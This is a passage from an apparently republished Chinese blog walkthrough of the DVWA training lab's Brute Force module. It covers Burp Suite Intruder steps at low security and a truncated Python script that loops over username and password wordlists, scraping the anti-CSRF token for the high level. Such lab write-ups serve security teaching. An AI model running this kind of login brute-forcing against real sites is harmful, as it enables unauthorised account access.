当前位置:   article > 正文

dvwa通关教程超详细_dvwa authbypass

dvwa authbypass

实验环境

burp+win10+php 5.3+python3
关于burpsuite全套使用教程点此
UNION 操作符用于合并两个或多个 SELECT 语句的结果集。

Brute Force

low

在这里插入图片描述
先随便输入一个账号密码
在随手抓一个包
在这里插入图片描述

选择这个
在这里插入图片描述
然后选择如图所示
在这里插入图片描述
然后这样选择
在这里插入图片描述
长度最长的一般就是密码
在这里插入图片描述

hign

在这里插入图片描述
在这里插入图片描述
按照这个教程
https://www.cnblogs.com/yuanshu/p/11690439.html

PYTHON

import re
import requests

header1 = {
   
    "Cookie": "PHPSESSID=493r4rd6h86v0lue5frn1ohdq5; security=high"  # 复制cookie文件
}

for username in open("user.txt"):  # 账户
    for password in open('pass.txt'): # 密码
        token = re.findall("name='user_token' value='(.*?)' />",
                           requests.get("http
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/羊村懒王/article/detail/559762
推荐阅读
相关标签
  

闽ICP备14008679号